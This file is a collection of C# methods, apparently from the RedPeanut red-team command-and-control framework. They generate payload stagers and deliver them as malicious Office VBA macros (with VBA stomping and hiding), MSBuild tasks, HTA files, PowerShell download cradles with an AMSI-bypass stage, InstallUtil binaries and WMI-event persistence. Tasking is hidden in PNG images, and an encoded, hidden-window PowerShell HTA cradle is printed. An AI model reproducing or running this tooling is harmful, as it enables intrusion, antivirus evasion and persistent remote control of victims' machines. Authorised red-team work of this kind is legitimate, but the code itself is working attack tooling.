static void Execute(string serverkey) { PrintBanner(); c2m = new C2Manager(); c2m.CreateC2Server(serverkey); CheckConfiguredListeners(c2m.GetC2Server()); int defaulthttpprofile = c2m.GetC2Server().GetDefaultProfile(); if (defaulthttpprofile != 0) { do { if (Menustack.Count == 0) { Menustack.Push(new RedPeanutManager(serverkey)); } Menustack.Peek().Execute(); } while (true); } else { Console.WriteLine("[x] Error loading profiles"); } }
private void Run() { List <string> args = new List <string>(); try { if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1) { return; } else { // Parse .cs sorce and repalce variable string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { //Building agent ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf); string outfilename = RandomAString(10, new Random()) + ".dll"; Builder.GenerateDll(source, outfilename, 35); //Add resource to webserver C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename)); string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/'); if (!uricontent.EndsWith("/")) { uricontent += "/"; } string resourcepath = uricontent + outfilename; //Build shooter assembly source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE)); source = Replacer.ReplaceAgentShooter(source, resourcepath, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35); VBAGenerator gen = new VBAGenerator(assemblyBase64, null); //Write file to dest dir string destdir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER); File.WriteAllText(Path.Combine(destdir, filename), gen.GetScriptText()); Console.WriteLine("[*] {0} Created", Path.Combine(destdir, filename)); } } } catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); return; } }
private void Run() { List <string> args = new List <string>(); try { if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1) { return; } else { // Parse .cs sorce and repalce variable string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, filename); byte[] assemblybytte = Convert.FromBase64String(assemblyBase64); string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte)); Dictionary <string, string> msbuildargs = new Dictionary <string, string>(); msbuildargs.Add("#{taskname}", taskname); MSBuildGenerator gen = new MSBuildGenerator(agentCompBase64, msbuildargs); if (hosted) { //Add resource to webserver storage C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename)); Console.WriteLine("[*] Resource added to webserver resources"); return; } else { //Write file to tmp env dir File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText()); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename)); } } } } catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); return; } }
private string CreateTaskMgs(IAgentInstance agent, TaskMsg task) { AesManaged aes = agent.AesManager; HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(Profileid); string mesg; if (profile.HtmlCovered) { string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); string outputfolderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER); string htmlsource = System.IO.File.ReadAllText(Path.Combine(folderrpath, HTML_TEMPLATE)); int elements = htmlsource.Split("targetclass").Length - 1; if (elements <= 0) { return(""); } string[] images = ListImages(); Random random = new Random(); int payloadindex = random.Next(1, elements); //Create Image with task embedded string taskmsg = JsonConvert.SerializeObject(task, Formatting.Indented); taskmsg = Convert.ToBase64String(EncryptAesMessage(taskmsg, aes)); string outputfilename = RandomAString(10, random) + ".png"; string outfullpath = Path.Combine(outputfolderrpath, outputfilename); string imagepath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, IMAGELOAD_FOLDER, "images", images[payloadindex - 1]); ImageGenerator.Create(Encoding.Default.GetBytes(taskmsg), imagepath, outfullpath); //Add Image to resources C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(outputfilename, new WebResourceInstance(null, outputfilename)); //Create html page htmlsource = Replacer.ReplaceHtmlProfile(htmlsource, profile.TargetClass, Encoding.Default.GetBytes(taskmsg).Length, outputfilename, elements, payloadindex, images); return(htmlsource); } else { string tasknmsg = JsonConvert.SerializeObject(task, Formatting.Indented); mesg = Convert.ToBase64String(EncryptAesMessage(tasknmsg, aes)); return(mesg); } }
static void MainMenu(string input) { if (!string.IsNullOrEmpty(input)) { if (mainmenu.ContainsKey(input)) { switch (input) { case "launcher": if (launcherm == null) { launcherm = new LauncherManager(null); } Program.GetMenuStack().Push(launcherm); exit = true; break; case "c2": if (c2m == null) { c2m = new C2Manager(); } Program.GetMenuStack().Push(c2m); exit = true; break; case "list": PrintOptions("Modules availlable", mainmenu); break; case "exit": exit = true; Console.WriteLine("See you soon"); ShutDown(); return; default: break; } } else { PrintOptionsNoStd("Command not found", mainmenu); } } }
private void Run() { try { if (!string.IsNullOrEmpty(targetfile)) { string filetowork = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER, targetfile); if (!File.Exists(filetowork)) { Console.WriteLine("[x] File not found {0}", filetowork); return; } string vbasrc = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER, sourcefile); if (!string.IsNullOrEmpty(sourcefile)) { if (!File.Exists(vbasrc)) { Console.WriteLine("[x] VBA source not found {0}", vbasrc); } } try { MSOfficeManipulator mSOfficeManipulator = new MSOfficeManipulator(filetowork, names.Split(' ')); List <string> args = new List <string>(); if (!string.IsNullOrEmpty(targetversion)) { mSOfficeManipulator.SetTargetOfficeVersion(targetversion); } if (unviewableVBA) { mSOfficeManipulator.UnviewableVBA(); } if (viewableVBA) { mSOfficeManipulator.ViewableVBA(); } if (guihide) { mSOfficeManipulator.HideInGUI(); } if (guiunhide) { mSOfficeManipulator.UnhideInGUI(); } if (!string.IsNullOrEmpty(sourcefile)) { mSOfficeManipulator.StompVBAModules(vbasrc); } if (randomnames) { mSOfficeManipulator.SetRandomNames(); } if (resetmodulenames) { mSOfficeManipulator.ResetModuleNames(); } if (delmetadata) { mSOfficeManipulator.DeleteMetadata(); } string outputfile = Path.GetFileName(mSOfficeManipulator.Commit()); Console.WriteLine("[*] Output file {0}", outputfile); //Add resource to webserver if required if (hosted) { //Add resource to webserver storage C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(outputfile, new WebResourceInstance(null, outputfile)); Console.WriteLine("[*] File added to webserver resources /office/{0}", outputfile); } } catch (Exception) { return; } } } catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); return; } }
private void Run() { try { List <string> args = new List <string>(); if (!string.IsNullOrEmpty(processname) && !string.IsNullOrEmpty(eventname)) { //Create webresource //Register web resource string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); string filename = RandomAString(10, new Random()).ToLower(); ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()), ((AgentInstanceHttp)agent).GetProfileid()); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, filename + ".dll"); byte[] assemblybytte = Convert.FromBase64String(assemblyBase64); string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte)); Dictionary <string, string> argagent = new Dictionary <string, string>(); argagent.Add("#{bytelen}", assemblybytte.Length.ToString()); string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()).ContentUri; uricontent = uricontent.TrimStart('/'); if (!uricontent.EndsWith("/")) { uricontent += "/"; } Dictionary <string, string> arg = new Dictionary <string, string> { { "#{lhost}", ((AgentInstanceHttp)agent).GetAddress() }, { "#{lport}", ((AgentInstanceHttp)agent).GetPort().ToString() }, { "#{uri}", uricontent + "s2_" + filename + ".ps1" } }; PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg); PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent); //Add resource to webserver storage C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(gen_s1, filename + ".ps1")); c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(gen_s2, "s2_" + filename + ".ps1")); Console.WriteLine("[*] Resource added to webserver resources"); string proto = ""; if (ssl) { proto = "https"; } else { proto = "http"; } string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), uricontent, filename + ".ps1"); string perssrc = File.ReadAllText(Path.Combine(folderrpath, PERSWMI_TEMPLATE)); perssrc = Replacer.ReplacePersWMI(perssrc, eventname, url, processname, encoded); RunAssemblyBase64( Convert.ToBase64String( CompressGZipAssembly( Builder.BuidStreamAssembly(perssrc, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.Persistence) ) ), "PersWMI", new string[] { " " }, agent); return; } } catch (Exception e) { Console.WriteLine("[x] Error generating task {0}", e.Message); } }
private void Run() { List <string> args = new List <string>(); try { if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1) { return; } else { if (lang == "vbs") { string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { //Building agent ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf); string outfilename = RandomAString(10, new Random()) + ".dll"; Builder.GenerateDll(source, outfilename, 35); //Add resource to webserver C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename)); string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/'); if (!uricontent.EndsWith("/")) { uricontent += "/"; } string resourcepath = uricontent + outfilename; //Build shooter assembly source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE)); source = Replacer.ReplaceAgentShooter(source, resourcepath, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35); HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null); if (hosted) { //Add resource to webserver storage c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename)); Console.WriteLine("[*] Resource added to webserver resources"); Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename); return; } else { //Write file to tmp env dir File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText()); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename)); } } } else { if (lang == "powershell") { string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { string psfilename = RandomString(10, new Random()) + ".ps1"; ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll"); Dictionary <string, string> arg = new Dictionary <string, string>(); arg.Add("#{lhost}", lhost); arg.Add("#{lport}", lport.ToString()); string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri; uricontent = uricontent.TrimStart('/'); if (!uricontent.EndsWith("/")) { uricontent += "/"; } arg.Add("#{uri}", uricontent + "s2_" + psfilename); byte[] assemblybytte = Convert.FromBase64String(assemblyBase64); string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte)); Dictionary <string, string> argagent = new Dictionary <string, string>(); argagent.Add("#{bytelen}", assemblybytte.Length.ToString()); PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg); PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg); PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent); HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null); if (hosted) { //Add resource to webserver storage C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename)); c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename)); c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename)); Console.WriteLine("[*] Resource added to webserver resources"); Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename); return; } else { //Write file to tmp env dir File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText()); File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText()); File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText()); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename)); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename)); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename)); } } } else { Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang); return; } } } }catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); return; } }
private void Run() { List <string> args = new List <string>(); try { if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1) { return; } else { // Parse .cs sorce and repalce variable string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, filename); Dictionary <string, string> arg = new Dictionary <string, string>(); arg.Add("#{lhost}", lhost); arg.Add("#{lport}", lport.ToString()); string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri; uricontent = uricontent.TrimStart('/'); if (!uricontent.EndsWith("/")) { uricontent += "/"; } arg.Add("#{uri}", uricontent + "s2_" + filename); byte[] assemblybytte = Convert.FromBase64String(assemblyBase64); string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte)); Dictionary <string, string> argagent = new Dictionary <string, string>(); argagent.Add("#{bytelen}", assemblybytte.Length.ToString()); PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg); PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg); PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent); if (hosted) { //Add resource to webserver storage C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen_s1, filename)); c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(gen_s2, "s2_" + filename)); Console.WriteLine("[*] Resource added to webserver resources"); Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename); Console.WriteLine("[*]"); Console.WriteLine("[*] Cradle example"); Console.WriteLine("[*]"); Console.WriteLine("<script language = \"VBScript\">"); Console.WriteLine(" Function etaget()"); Console.WriteLine(""); Console.WriteLine(" Dim ahsten"); Console.WriteLine(" Set ahsten = CreateObject(\"Wscript.Shell\")"); Console.WriteLine(" ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", gen_s0.GetScriptText()); Console.WriteLine(" End Function"); Console.WriteLine(""); Console.WriteLine(" etaget"); Console.WriteLine(" self.close"); Console.WriteLine("</script>"); Console.WriteLine("[*]"); return; } else { //Write file to tmp env dir File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen_s1.GetScriptText()); File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + filename), gen_s2.GetScriptText()); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename)); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + filename)); } } } } catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); return; } }
private void Run() { List <string> args = new List <string>(); try { if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1) { return; } else { // Parse .cs sorce and repalce variable string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, "tmp_" + filename); byte[] assemblybytte = Convert.FromBase64String(assemblyBase64); string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte)); string sourceinstallutil = File.ReadAllText(Path.Combine(folderrpath, INSTALLUTIL_TEMPLATE)) .Replace("#{assembly}", agentCompBase64); Builder.GenerateExe(sourceinstallutil, filename); if (File.Exists(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename))) { if (hosted) { //Add resource to webserver storage C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(null, filename)); Console.WriteLine("[*] Resource added to webserver resources"); return; } else { //Write file to tmp env dir File.WriteAllBytes(Path.Combine(Path.GetTempPath(), filename), File.ReadAllBytes(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename))); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename)); } } else { Console.WriteLine("[x] Error creating IndtallUtil dll"); } } } } catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); return; } }